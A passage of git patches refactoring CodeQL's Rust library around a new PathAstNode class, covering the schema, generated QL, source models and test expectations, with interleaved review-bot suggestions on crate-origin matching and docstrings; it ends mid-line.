@@ -3447,6 +3459,22 @@ module Synth { result = convertWildcardPatToRaw(e) } + /** + * INTERNAL: Do not use. + * Converts a synthesized `TPathAstNode` to a raw DB element, if possible. + */ + Raw::Element convertPathAstNodeToRaw(TPathAstNode e) { + result = convertPathExprToRaw(e) + or + result = convertPathPatToRaw(e) + or + result = convertRecordExprToRaw(e) + or + result = convertRecordPatToRaw(e) + or + result = convertTupleStructPatToRaw(e) + } + /** * INTERNAL: Do not use. * Converts a synthesized `TPathExprBase` to a raw DB element, if possible. @@ -3464,15 +3492,7 @@ module Synth { Raw::Element convertResolvableToRaw(TResolvable e) { result = convertMethodCallExprToRaw(e) or - result = convertPathExprBaseToRaw(e) - or - result = convertPathPatToRaw(e) - or - result = convertRecordExprToRaw(e) - or - result = convertRecordPatToRaw(e) - or - result = convertTupleStructPatToRaw(e) + result = convertPathAstNodeToRaw(e) } /** diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/TupleStructPat.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/TupleStructPat.qll index 9e57c0a9ad8..5945467cd1c 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/TupleStructPat.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/TupleStructPat.qll @@ -8,8 +8,7 @@ private import codeql.rust.elements.internal.generated.Synth private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.Pat import codeql.rust.elements.internal.PatImpl::Impl as PatImpl -import codeql.rust.elements.Path -import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl +import codeql.rust.elements.internal.PathAstNodeImpl::Impl as PathAstNodeImpl /** * INTERNAL: This module contains the fully generated definition of `TupleStructPat` and should not 
@@ -28,7 +27,7 @@ module Generated { * INTERNAL: Do not reference the `Generated::TupleStructPat` class directly. * Use the subclass `TupleStructPat`, where the following predicates are available. */ - class TupleStructPat extends Synth::TTupleStructPat, PatImpl::Pat, ResolvableImpl::Resolvable { + class TupleStructPat extends Synth::TTupleStructPat, PatImpl::Pat, PathAstNodeImpl::PathAstNode { override string getAPrimaryQlClass() { result = "TupleStructPat" } /** @@ -50,20 +49,5 @@ module Generated { * Gets the number of fields of this tuple struct pat. */ final int getNumberOfFields() { result = count(int i | exists(this.getField(i))) } - - /** - * Gets the path of this tuple struct pat, if it exists. - */ - Path getPath() { - result = - Synth::convertPathFromRaw(Synth::convertTupleStructPatToRaw(this) - .(Raw::TupleStructPat) - .getPath()) - } - - /** - * Holds if `getPath()` exists. - */ - final predicate hasPath() { exists(this.getPath()) } } } diff --git a/rust/ql/lib/codeql/rust/frameworks/Reqwest.qll b/rust/ql/lib/codeql/rust/frameworks/Reqwest.qll index f46c12feab9..2d3e04f94b3 100644 --- a/rust/ql/lib/codeql/rust/frameworks/Reqwest.qll +++ b/rust/ql/lib/codeql/rust/frameworks/Reqwest.qll @@ -12,9 +12,8 @@ private class ReqwestGet extends RemoteSource::Range { ReqwestGet() { exists(CallExpr ce | this.asExpr().getExpr() = ce and - ce.getFunction().(PathExpr).getPath().getResolvedCrateOrigin().matches("%reqwest") and - ce.getFunction().(PathExpr).getPath().getResolvedPath() = - ["crate::get", "crate::blocking::get"] + ce.getFunction().(PathExpr).getResolvedCrateOrigin().matches("%reqwest") and + ce.getFunction().(PathExpr).getResolvedPath() = ["crate::get", "crate::blocking::get"] ) } } diff --git a/rust/ql/lib/codeql/rust/frameworks/stdlib/Env.qll b/rust/ql/lib/codeql/rust/frameworks/stdlib/Env.qll index 3e769ae84d4..8410da77a06 100644 --- a/rust/ql/lib/codeql/rust/frameworks/stdlib/Env.qll +++ b/rust/ql/lib/codeql/rust/frameworks/stdlib/Env.qll 
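Review bot: In the Reqwest.qll hunk, the crate check `getResolvedCrateOrigin().matches("%reqwest")` is a suffix match, so any crate whose origin string merely ends in `reqwest` would also be modelled as a remote source by `ReqwestGet`. If origin strings follow the prefixed form that BadCtorInitialization.ql compares against (`"lang:std"`), anchoring on the separator, for example `.matches("%:reqwest")`, or comparing the full origin with `=`, would keep the source model from picking up look-alike crates; the exact format should be confirmed against extracted data. The cast `ce.getFunction().(PathExpr)` is also written twice, and binding it once (`exists(CallExpr ce, PathExpr f | f = ce.getFunction() and ...)`) would make it obvious that both conditions apply to the same node.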
@@ -10,7 +10,7 @@ private import codeql.rust.Concepts */ private class StdEnvArgs extends CommandLineArgsSource::Range { StdEnvArgs() { - this.asExpr().getExpr().(CallExpr).getFunction().(PathExpr).getPath().getResolvedPath() = + this.asExpr().getExpr().(CallExpr).getFunction().(PathExpr).getResolvedPath() = ["crate::env::args", "crate::env::args_os"] } } @@ -20,7 +20,7 @@ private class StdEnvArgs extends CommandLineArgsSource::Range { */ private class StdEnvDir extends CommandLineArgsSource::Range { StdEnvDir() { - this.asExpr().getExpr().(CallExpr).getFunction().(PathExpr).getPath().getResolvedPath() = + this.asExpr().getExpr().(CallExpr).getFunction().(PathExpr).getResolvedPath() = ["crate::env::current_dir", "crate::env::current_exe", "crate::env::home_dir"] } } @@ -30,7 +30,7 @@ private class StdEnvDir extends CommandLineArgsSource::Range { */ private class StdEnvVar extends EnvironmentSource::Range { StdEnvVar() { - this.asExpr().getExpr().(CallExpr).getFunction().(PathExpr).getPath().getResolvedPath() = + this.asExpr().getExpr().(CallExpr).getFunction().(PathExpr).getResolvedPath() = ["crate::env::var", "crate::env::var_os", "crate::env::vars", "crate::env::vars_os"] } } diff --git a/rust/ql/lib/rust.dbscheme b/rust/ql/lib/rust.dbscheme index d63c6d62298..801789b2d99 100644 --- a/rust/ql/lib/rust.dbscheme +++ b/rust/ql/lib/rust.dbscheme @@ -843,11 +843,7 @@ rename_names( @resolvable = @method_call_expr -| @path_expr_base -| @path_pat -| @record_expr -| @record_pat -| @tuple_struct_pat +| @path_ast_node ; #keyset[id] 
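Review bot: `StdEnvArgs`, and likewise `StdEnvDir` and `StdEnvVar` in the next two Env.qll hunks, recognise the standard-library functions by `getResolvedPath()` alone, and the matched strings are crate-relative (`"crate::env::args"`), so a function at `env::args` in any other crate would presumably be treated as a threat-model source as well. `ReqwestGet` in Reqwest.qll pairs the path with a crate-origin check, and the same could be done here by adding a conjunct such as `this.asExpr().getExpr().(CallExpr).getFunction().(PathExpr).getResolvedCrateOrigin() = "lang:std"`, the origin string BadCtorInitialization.ql already uses. Separately, `StdEnvDir` extends `CommandLineArgsSource::Range` although `current_dir`, `current_exe` and `home_dir` are not arguments; a short comment saying why they are grouped under that category would help readers tuning threat models.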
@@ -1984,20 +1980,24 @@ paren_type_ties( int ty: @type_ref ref ); +@path_ast_node = + @path_expr +| @path_pat +| @record_expr +| @record_pat +| @tuple_struct_pat +; + +#keyset[id] +path_ast_node_paths( + int id: @path_ast_node ref, + int path: @path ref +); + @path_expr_base = @path_expr ; -path_pats( - unique int id: @path_pat -); - -#keyset[id] -path_pat_paths( - int id: @path_pat ref, - int path: @path ref -); - path_types( unique int id: @path_type ); @@ -2102,22 +2102,6 @@ range_pat_starts( int start: @pat ref ); -record_exprs( - unique int id: @record_expr -); - -#keyset[id] -record_expr_paths( - int id: @record_expr ref, - int path: @path ref -); - -#keyset[id] -record_expr_record_expr_field_lists( - int id: @record_expr ref, - int record_expr_field_list: @record_expr_field_list ref -); - record_field_lists( unique int id: @record_field_list ); @@ -2129,22 +2113,6 @@ record_field_list_fields( int field: @record_field ref ); -record_pats( - unique int id: @record_pat -); - -#keyset[id] -record_pat_paths( - int id: @record_pat ref, - int path: @path ref -); - -#keyset[id] -record_pat_record_pat_field_lists( - int id: @record_pat ref, - int record_pat_field_list: @record_pat_field_list ref -); - ref_exprs( unique int id: @ref_expr ); @@ -2340,23 +2308,6 @@ tuple_pat_fields( int field: @pat ref ); -tuple_struct_pats( - unique int id: @tuple_struct_pat -); - -#keyset[id, index] -tuple_struct_pat_fields( - int id: @tuple_struct_pat ref, - int index: int ref, - int field: @pat ref -); - -#keyset[id] -tuple_struct_pat_paths( - int id: @tuple_struct_pat ref, - int path: @path ref -); - tuple_types( unique int id: @tuple_type ); 
@@ -2991,10 +2942,28 @@ path_expr_attrs( int attr: @attr ref ); +path_pats( + unique int id: @path_pat +); + +record_exprs( + unique int id: @record_expr +); + #keyset[id] -path_expr_paths( - int id: @path_expr ref, - int path: @path ref +record_expr_record_expr_field_lists( + int id: @record_expr ref, + int record_expr_field_list: @record_expr_field_list ref +); + +record_pats( + unique int id: @record_pat +); + +#keyset[id] +record_pat_record_pat_field_lists( + int id: @record_pat ref, + int record_pat_field_list: @record_pat_field_list ref ); statics( @@ -3181,6 +3150,17 @@ trait_alias_where_clauses( int where_clause: @where_clause ref ); +tuple_struct_pats( + unique int id: @tuple_struct_pat +); + +#keyset[id, index] +tuple_struct_pat_fields( + int id: @tuple_struct_pat ref, + int index: int ref, + int field: @pat ref +); + type_aliases( unique int id: @type_alias ); diff --git a/rust/ql/src/queries/security/CWE-696/BadCtorInitialization.ql b/rust/ql/src/queries/security/CWE-696/BadCtorInitialization.ql index 22ea6514e02..a8607569974 100644 --- a/rust/ql/src/queries/security/CWE-696/BadCtorInitialization.ql +++ b/rust/ql/src/queries/security/CWE-696/BadCtorInitialization.ql @@ -32,7 +32,7 @@ class CtorAttr extends Attr { */ class StdCall extends Expr { StdCall() { - this.(CallExpr).getFunction().(PathExpr).getPath().getResolvedCrateOrigin() = "lang:std" or + this.(CallExpr).getFunction().(PathExpr).getResolvedCrateOrigin() = "lang:std" or this.(MethodCallExpr).getResolvedCrateOrigin() = "lang:std" } } diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.expected b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.expected index 4f9a487e85d..df4fdad5c91 100644 --- a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.expected +++ b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.expected 
@@ -1,5 +1,5 @@ -| gen_format_args_expr.rs:9:20:9:20 | x | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | -| gen_format_args_expr.rs:9:25:9:25 | y | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | -| gen_format_argument.rs:5:22:5:26 | value | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | -| gen_format_argument.rs:5:29:5:33 | width | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | -| gen_format_argument.rs:5:36:5:44 | precision | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | +| gen_format_args_expr.rs:9:20:9:20 | x | +| gen_format_args_expr.rs:9:25:9:25 | y | +| gen_format_argument.rs:5:22:5:26 | value | +| gen_format_argument.rs:5:29:5:33 | width | +| gen_format_argument.rs:5:36:5:44 | precision | diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql index 488207bc5bb..4f43ca11870 100644 --- a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql +++ b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql @@ -2,12 +2,6 @@ import codeql.rust.elements import TestUtils -from FormatTemplateVariableAccess x, string hasResolvedPath, string hasResolvedCrateOrigin -where - toBeTested(x) and - not x.isUnknown() and - (if x.hasResolvedPath() then hasResolvedPath = "yes" else hasResolvedPath = "no") and - if x.hasResolvedCrateOrigin() - then hasResolvedCrateOrigin = "yes" - else hasResolvedCrateOrigin = "no" -select x, "hasResolvedPath:", hasResolvedPath, "hasResolvedCrateOrigin:", hasResolvedCrateOrigin +from FormatTemplateVariableAccess x +where toBeTested(x) and not x.isUnknown() +select x 
diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.expected b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.expected deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql deleted file mode 100644 index 8022e46e327..00000000000 --- a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql +++ /dev/null @@ -1,7 +0,0 @@ -// generated by codegen, do not edit -import codeql.rust.elements -import TestUtils - -from FormatTemplateVariableAccess x -where toBeTested(x) and not x.isUnknown() -select x, x.getResolvedCrateOrigin() diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.expected b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.expected deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql deleted file mode 100644 index 916fb7da09b..00000000000 --- a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql +++ /dev/null @@ -1,7 +0,0 @@ -// generated by codegen, do not edit -import codeql.rust.elements -import TestUtils - -from FormatTemplateVariableAccess x -where toBeTested(x) and not x.isUnknown() -select x, x.getResolvedPath() 
diff --git a/rust/ql/test/extractor-tests/generated/Path/PathExpr.expected b/rust/ql/test/extractor-tests/generated/Path/PathExpr.expected index 540ad015ddb..b9032fb4384 100644 --- a/rust/ql/test/extractor-tests/generated/Path/PathExpr.expected +++ b/rust/ql/test/extractor-tests/generated/Path/PathExpr.expected @@ -1,6 +1,6 @@ -| gen_path.rs:6:5:6:12 | ...::bar | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | -| gen_path_expr.rs:5:13:5:20 | variable | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | -| gen_path_expr.rs:6:13:6:20 | ...::bar | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | -| gen_path_expr.rs:7:13:7:20 | ...::foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | -| gen_path_expr.rs:8:13:8:35 | ...::foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | -| gen_path_pat.rs:5:11:5:11 | x | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | +| gen_path.rs:6:5:6:12 | ...::bar | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfAttrs: | 0 | +| gen_path_expr.rs:5:13:5:20 | variable | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfAttrs: | 0 | +| gen_path_expr.rs:6:13:6:20 | ...::bar | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfAttrs: | 0 | +| gen_path_expr.rs:7:13:7:20 | ...::foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfAttrs: | 0 | +| gen_path_expr.rs:8:13:8:35 | ...::foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfAttrs: | 0 | +| gen_path_pat.rs:5:11:5:11 | x | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfAttrs: | 0 | 
diff --git a/rust/ql/test/extractor-tests/generated/Path/PathExpr.ql b/rust/ql/test/extractor-tests/generated/Path/PathExpr.ql index 62db075a1ac..41b7414d24c 100644 --- a/rust/ql/test/extractor-tests/generated/Path/PathExpr.ql +++ b/rust/ql/test/extractor-tests/generated/Path/PathExpr.ql @@ -3,8 +3,8 @@ import codeql.rust.elements import TestUtils from - PathExpr x, string hasResolvedPath, string hasResolvedCrateOrigin, int getNumberOfAttrs, - string hasPath + PathExpr x, string hasResolvedPath, string hasResolvedCrateOrigin, string hasPath, + int getNumberOfAttrs where toBeTested(x) and not x.isUnknown() and @@ -14,7 +14,7 @@ where then hasResolvedCrateOrigin = "yes" else hasResolvedCrateOrigin = "no" ) and - getNumberOfAttrs = x.getNumberOfAttrs() and - if x.hasPath() then hasPath = "yes" else hasPath = "no" + (if x.hasPath() then hasPath = "yes" else hasPath = "no") and + getNumberOfAttrs = x.getNumberOfAttrs() select x, "hasResolvedPath:", hasResolvedPath, "hasResolvedCrateOrigin:", hasResolvedCrateOrigin, - "getNumberOfAttrs:", getNumberOfAttrs, "hasPath:", hasPath + "hasPath:", hasPath, "getNumberOfAttrs:", getNumberOfAttrs diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected index 9fa41161bcb..9e9de534b1e 100644 --- a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected +++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected 
@@ -1,3 +1,3 @@ -| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfFields: | 4 | hasPath: | yes | -| gen_tuple_struct_pat.rs:7:9:7:20 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfFields: | 2 | hasPath: | yes | -| gen_tuple_struct_pat.rs:8:9:8:17 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfFields: | 1 | hasPath: | yes | +| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfFields: | 4 | +| gen_tuple_struct_pat.rs:7:9:7:20 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfFields: | 2 | +| gen_tuple_struct_pat.rs:8:9:8:17 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfFields: | 1 | diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql index 14ba21627af..af59101fe75 100644 --- a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql +++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql @@ -3,8 +3,8 @@ import codeql.rust.elements import TestUtils from - TupleStructPat x, string hasResolvedPath, string hasResolvedCrateOrigin, int getNumberOfFields, - string hasPath + TupleStructPat x, string hasResolvedPath, string hasResolvedCrateOrigin, string hasPath, + int getNumberOfFields where toBeTested(x) and not x.isUnknown() and 
@@ -14,7 +14,7 @@ where then hasResolvedCrateOrigin = "yes" else hasResolvedCrateOrigin = "no" ) and - getNumberOfFields = x.getNumberOfFields() and - if x.hasPath() then hasPath = "yes" else hasPath = "no" + (if x.hasPath() then hasPath = "yes" else hasPath = "no") and + getNumberOfFields = x.getNumberOfFields() select x, "hasResolvedPath:", hasResolvedPath, "hasResolvedCrateOrigin:", hasResolvedCrateOrigin, - "getNumberOfFields:", getNumberOfFields, "hasPath:", hasPath + "hasPath:", hasPath, "getNumberOfFields:", getNumberOfFields diff --git a/rust/ql/test/library-tests/dataflow/sources/InlineFlow.ql b/rust/ql/test/library-tests/dataflow/sources/InlineFlow.ql index 2b08aeea63f..5bcbe05229b 100644 --- a/rust/ql/test/library-tests/dataflow/sources/InlineFlow.ql +++ b/rust/ql/test/library-tests/dataflow/sources/InlineFlow.ql @@ -10,9 +10,9 @@ module MyFlowConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof ThreatModelSource } predicate isSink(DataFlow::Node sink) { - any(CallExpr call | - call.getFunction().(PathExpr).getPath().getResolvedPath() = "crate::test::sink" - ).getArgList().getAnArg() = sink.asExpr().getExpr() + any(CallExpr call | call.getFunction().(PathExpr).getResolvedPath() = "crate::test::sink") + .getArgList() + .getAnArg() = sink.asExpr().getExpr() } } diff --git a/rust/schema/annotations.py b/rust/schema/annotations.py index 05a163de9bf..d51f5328380 100644 --- a/rust/schema/annotations.py +++ b/rust/schema/annotations.py @@ -114,13 +114,13 @@ class _: """ -class PathExprBase(Expr, Resolvable): +class PathExprBase(Expr): """ A path expression or a variable access in a formatting template. See `PathExpr` and `FormatTemplateVariableAccess` for further details. """ -@annotate(PathExpr, replace_bases={Expr: PathExprBase}, cfg = True) +@annotate(PathExpr, replace_bases={Expr: PathExprBase}, add_bases=(PathAstNode,), cfg = True) @qltest.test_with(Path) class _: """ 
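Review bot: The new `isSink` body in InlineFlow.ql is an `any(...)` aggregate followed by a trailing `.getArgList()` / `.getAnArg()` chain, which obscures that the predicate only says "some call to the test sink has this argument". An `exists` states that directly: `exists(CallExpr call |`, `call.getFunction().(PathExpr).getResolvedPath() = "crate::test::sink" and`, `call.getArgList().getAnArg() = sink.asExpr().getExpr())`. Because the sink is identified by an exact string comparison on the resolved path, a short comment such as `// sink is matched by resolved path; needs path resolution to succeed for the callee` would help whoever debugs a run that reports no flow. `MyFlowConfig` opens before this hunk.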
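Review bot: `PathExprBase` loses `Resolvable` in the annotations.py hunk at `-114,13`, but its docstring still presents it as the common base of `PathExpr` and `FormatTemplateVariableAccess` without saying which of them can be resolved. After this change only `PathExpr` is resolvable, through `add_bases=(PathAstNode,)`, so a format-template variable access presumably no longer carries `resolved_path` or `resolved_crate_origin`. One added docstring sentence would make that visible to query authors, for example `Only PathExpr is resolvable (via PathAstNode); template variable accesses carry no resolved path.` The annotated `PathExpr` class body continues past the end of the hunk.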
@@ -132,6 +132,7 @@ class _: let z = ::foo; ``` """ + path: drop @annotate(IfExpr, cfg = True) @@ -412,7 +413,7 @@ class _: """ -@annotate(RecordExpr, add_bases=(Resolvable,), cfg = True) +@annotate(RecordExpr, add_bases=(PathAstNode,), cfg = True) class _: """ A record expression. For example: @@ -423,6 +424,7 @@ class _: Foo { .. } = second; ``` """ + path: drop @annotate(FieldExpr, cfg = True) @@ -682,7 +684,7 @@ class _: """ -@annotate(RecordPat, add_bases=(Resolvable,), cfg = True) +@annotate(RecordPat, add_bases=(PathAstNode,), cfg = True) class _: """ A record pattern. For example: @@ -693,6 +695,7 @@ class _: } ``` """ + path: drop @annotate(RangePat, cfg = True) @@ -723,7 +726,7 @@ class _: """ -@annotate(PathPat, add_bases=(Resolvable,), cfg = True) +@annotate(PathPat, add_bases=(PathAstNode,), cfg = True) @qltest.test_with(Path) class _: """ @@ -735,6 +738,7 @@ class _: } ``` """ + path: drop @annotate(LiteralPat, cfg = True) @@ -769,7 +773,7 @@ class _: """ -@annotate(TupleStructPat, add_bases=(Resolvable,), cfg = True) +@annotate(TupleStructPat, add_bases=(PathAstNode,), cfg = True) class _: """ A tuple struct pattern. For example: @@ -781,6 +785,7 @@ class _: }; ``` """ + path: drop @annotate(RefPat, cfg = True) diff --git a/rust/schema/prelude.py b/rust/schema/prelude.py index 9b9858be6a5..c22875cc858 100644 --- a/rust/schema/prelude.py +++ b/rust/schema/prelude.py @@ -89,7 +89,14 @@ class Addressable(AstNode): class Resolvable(AstNode): """ - Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`. + One of `PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat` or `MethodCallExpr`. """ resolved_path: optional[string] | rust.detach | ql.internal resolved_crate_origin: optional[string] | rust.detach | ql.internal + + +class PathAstNode(Resolvable): + """ + An AST element wrapping a path (`PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat`). + """ + path: optional["Path"] | child 
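Review bot: The `path: drop` line added in the `-132,6` hunk has no comment, and read in isolation it suggests that `PathExpr` no longer has a path. From the prelude.py change in the same patch it appears the field is dropped only because `PathAstNode` now declares `path`, so a comment above it such as `# path is declared once on PathAstNode` would save the next reader a search. The same comment fits the `path: drop` lines added for `RecordExpr`, `RecordPat`, `PathPat` and `TupleStructPat` in the hunks that follow. The class body each line belongs to starts above its hunk.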
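Review bot: In the prelude.py hunk the rewritten `Resolvable` docstring repeats the class list that the new `PathAstNode` docstring also spells out, so the two lists will drift the next time a path-wrapping node is added. Describing `Resolvable` in terms of the new base keeps a single list: `Either a PathAstNode or a MethodCallExpr.`, with the class names in backticks as elsewhere in the file. It would also help to say in the `PathAstNode` docstring that `path` is optional, since callers need to handle a node with no path.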
From e9deec7217f70db573d081bd9c6b9415f6b762c1 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 29 Nov 2024 16:03:06 +0000 Subject: [PATCH 0768/1267] Rust: Autoformat. --- .../frameworks/StandardLibrary/RawRepresentable.qll | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/RawRepresentable.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/RawRepresentable.qll index bc468d3c4f8..bbd583a32a4 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/RawRepresentable.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/RawRepresentable.qll @@ -12,10 +12,11 @@ private import codeql.swift.dataflow.FlowSteps */ private class RawRepresentableSummaries extends SummaryModelCsv { override predicate row(string row) { - row = [ - ";RawRepresentable;true;init(rawValue:);;;Argument[0];ReturnValue;taint", - ";OptionSet;true;init(rawValue:);;;Argument[0];ReturnValue;taint" - ] + row = + [ + ";RawRepresentable;true;init(rawValue:);;;Argument[0];ReturnValue;taint", + ";OptionSet;true;init(rawValue:);;;Argument[0];ReturnValue;taint" + ] } } From bb83641634c13ea42c66dbf7d0bfe599354a522a Mon Sep 17 00:00:00 2001 
From: Paolo Tranquilli Date: Mon, 2 Dec 2024 08:22:51 +0100 Subject: [PATCH 0769/1267] Rust: accept all test changes for now --- .../generated/BoxPat/BoxPat_getPat.expected | 2 +- .../IdentPat/IdentPat_getPat.expected | 2 +- .../generated/LetExpr/LetExpr_getPat.expected | 2 +- .../generated/LetStmt/LetStmt_getPat.expected | 2 +- .../MatchArm/MatchArm_getPat.expected | 4 +- .../generated/OrPat/OrPat_getPat.expected | 2 +- .../generated/RefPat/RefPat_getPat.expected | 2 +- .../controlflow-unstable/Cfg.expected | 6 +- .../library-tests/controlflow/Cfg.expected | 68 +++++----- .../dataflow/local/DataFlowStep.expected | 68 ++++++---- .../dataflow/local/inline-flow.expected | 56 ++++++-- .../test/library-tests/variables/Cfg.expected | 128 +++++++++--------- 12 files changed, 198 insertions(+), 144 deletions(-) diff --git a/rust/ql/test/extractor-tests/generated/BoxPat/BoxPat_getPat.expected b/rust/ql/test/extractor-tests/generated/BoxPat/BoxPat_getPat.expected index 4e12432652d..a43975657a8 100644 --- a/rust/ql/test/extractor-tests/generated/BoxPat/BoxPat_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/BoxPat/BoxPat_getPat.expected @@ -1,2 +1,2 @@ -| gen_box_pat.rs:6:9:6:27 | box ... | gen_box_pat.rs:6:13:6:27 | TupleStructPat | +| gen_box_pat.rs:6:9:6:27 | box ... | gen_box_pat.rs:6:13:6:27 | ...::Some(...) | | gen_box_pat.rs:7:9:7:24 | box ...::None | gen_box_pat.rs:7:13:7:24 | ...::None | diff --git a/rust/ql/test/extractor-tests/generated/IdentPat/IdentPat_getPat.expected b/rust/ql/test/extractor-tests/generated/IdentPat/IdentPat_getPat.expected index 2e2f0d9228e..3c2fd2dc379 100644 --- a/rust/ql/test/extractor-tests/generated/IdentPat/IdentPat_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/IdentPat/IdentPat_getPat.expected @@ -1 +1 @@ -| gen_ident_pat.rs:10:9:10:25 | y | gen_ident_pat.rs:10:11:10:25 | TupleStructPat | +| gen_ident_pat.rs:10:9:10:25 | y | gen_ident_pat.rs:10:11:10:25 | ...::Some(...) | 
diff --git a/rust/ql/test/extractor-tests/generated/LetExpr/LetExpr_getPat.expected b/rust/ql/test/extractor-tests/generated/LetExpr/LetExpr_getPat.expected index 7c31e314128..b935bd98013 100644 --- a/rust/ql/test/extractor-tests/generated/LetExpr/LetExpr_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/LetExpr/LetExpr_getPat.expected @@ -1 +1 @@ -| gen_let_expr.rs:5:8:5:31 | let ... = maybe_some | gen_let_expr.rs:5:12:5:18 | TupleStructPat | +| gen_let_expr.rs:5:8:5:31 | let ... = maybe_some | gen_let_expr.rs:5:12:5:18 | Some(...) | diff --git a/rust/ql/test/extractor-tests/generated/LetStmt/LetStmt_getPat.expected b/rust/ql/test/extractor-tests/generated/LetStmt/LetStmt_getPat.expected index 758837c946d..cd4c3f8cc64 100644 --- a/rust/ql/test/extractor-tests/generated/LetStmt/LetStmt_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/LetStmt/LetStmt_getPat.expected @@ -3,4 +3,4 @@ | gen_let_stmt.rs:7:5:7:15 | let ... | gen_let_stmt.rs:7:9:7:9 | x | | gen_let_stmt.rs:8:5:8:10 | let ... | gen_let_stmt.rs:8:9:8:9 | x | | gen_let_stmt.rs:9:5:9:24 | let ... = ... | gen_let_stmt.rs:9:9:9:14 | TuplePat | -| gen_let_stmt.rs:10:5:12:6 | let ... = ... else {...} | gen_let_stmt.rs:10:9:10:15 | TupleStructPat | +| gen_let_stmt.rs:10:5:12:6 | let 